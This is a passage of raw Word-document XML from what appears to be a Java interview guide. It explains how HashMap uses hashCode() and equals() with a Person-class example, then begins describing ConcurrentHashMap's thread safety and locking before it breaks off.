          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of keys is determined using two methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762A946E" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Code() method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8D2B7B" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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quals() method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CA00B2" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A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ow HashMap Determines if Two Objects are the Same or Different:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0489A5E7" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you insert a key-value pair into a HashMap, the hashCode() method of the key is called to compute the hash value. This hash value is used to determine the bucket (or location) in the HashMap where the key-value pair should be stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAE3E80" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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wo keys have the same hash code, they are placed in the same bucket (though not necessarily the same position within the bucket).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA07516" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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y have different hash codes, they are placed in different buckets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B8BCDD" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ucket Collision Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If two keys have the same hash code (a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash collision</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), the HashMap needs to check if the keys are actually the same or just have the same hash code. To do this, it uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>equals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method to compare the objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32322508" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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hashCode() returns the same value for two objects, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>equals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to check if the two objects are truly equal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C366F8" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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equals() returns true, the keys are considered the same, and the new key-value pair will </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replace</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the old one in the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B520161" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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equals() returns false, the objects are considered different, and a new entry is added to the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640B8C13" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ault Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you don't override the hashCode() and equals() methods in your custom class, Java will use the default implementations from the Object class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A09AAB1" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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Code()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It returns a hash code based on the memory address of the object (which means that different objects will usually have different hash codes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE61075" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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equals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It compares the object references (using ==), meaning that two different instances of a class are considered unequal unless they are the exact same instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48122F45" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A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7CAC50F1"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 is an example of how the HashMap checks for key equality using both hashCode() and equals():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AA1672"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HashMap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2C1F02" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70AE527C"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Person {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9F592D"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int id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2D168B"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ring name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C6D4B9" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40DB8B5C"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Person(int id, String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417E0D35"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id = id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCD7A5B"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name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DBAF34"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ADD35EE" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="436AD5B6"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Override hashCode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74957078"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2408A521"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int hashCode() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB3AE70"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id;  // Simple hashCode based on 'id'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A37FB84"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0B8E879" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40BB248D"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Override equals()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667610B5"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5A6BE7A3"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boolean equals(Object obj) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A24A07"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this == obj) return true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FEEB61"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obj == null || getClass() != obj.getClass()) return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42988D07"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erson person = (Person) obj;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7167267F"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id == person.id &amp;&amp; name.equals(person.name);  // Two persons are equal if they have the same id and name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3CD7FD"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236D682"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CD00BA6" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="645BB1A6"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HashMapExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBB1F0C"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21A2DEDC"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HashMap&lt;Person, String&gt; map = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004C6D0D" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F003802"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erson p1 = new Person(1, "Alice");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1671659E"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erson p2 = new Person(1, "Alice");  // Same id and name as p1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17542BC9" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13206B56"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p1, "Engineer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC27972"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p2, "Doctor");  // Will replace "Engineer" because p1 and p2 are considered equal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B9E716" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EE2E66C"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map);  // Output: {Person@hashCode=Doctor}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AE9640"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1C6E6FF" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335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698A4FF" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A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ow it Works in This Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FE94BE" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Code()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The Person class overrides hashCode() to return the id of the person. In this case, both p1 and p2 have the same id, so they will have the same hash code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699D0926" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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quals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The equals() method is overridden to check if two Person objects are equal based on both id and name. Since p1 and p2 have the same id and name, equals() will return true, meaning they are considered the same.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4874E5A0" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ult</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When p2 is inserted into the map, it has the same hash code as p1 (because they have the same id), and equals() returns true, so the value associated with p1 is replaced by "Doctor".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4799F767" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A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78B500CF" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Code()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Determines the bucket where the key-value pair is stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ECEF99" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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quals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Determines if two keys are the same when they land in the same bucket (hash collision).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B097B9" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Override Both</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For a custom class used as a key in a HashMap, you should override both hashCode() and equals() methods to ensure proper equality checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D91CC5" w14:textId="68F99EE1"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3DAB90B">
          <v:rect id="_x0000_i1547" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="306F3593" w14:textId="77777777" w:rsidR="00AD662A" w:rsidRPr="00CE4B95" w:rsidRDefault="00AD662A" w:rsidP="00AD662A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="179" w:name="_Toc196307659"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of a ConcurrentHashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="179"/>
    </w:p>
    <w:p w14:paraId="7C685724" w14:textId="27908891" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">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oncurrentHashMap is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> version of a HashMap in Java, designed to allow concurrent access to the map by multiple threads without causing data corruption or inconsistency. It provides higher concurrency and scalability compared to other synchronized collections like Hashtable or Collections.synchronizedMap().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E40BAB" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00983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Features of ConcurrentHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA0883F" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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 Safety</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4597ACA8" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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currentHashMap allows multiple threads to read and write data concurrently without the risk of data corruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C785B7" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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nlike Hashtable, which synchronizes the entire map for every operation, ConcurrentHashMap uses a fine-grained locking mechanism, allowing better concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F61B1C6" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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cking Strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EDA8CF" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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divides the map into </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>segments</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and each segment can be locked independently, which reduces contention when multiple threads access different segments of the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0571E9AA" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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example, if one thread is updating a value in one segment, other threads can still access other segments concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1DD7C6" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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mproved Read Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EBCFE6" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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ads</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Operations like get() are lock-free, meaning they can be performed without locking the map, making read operations much faster and more scalable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469385E4" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="009833A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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rites/Updates</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
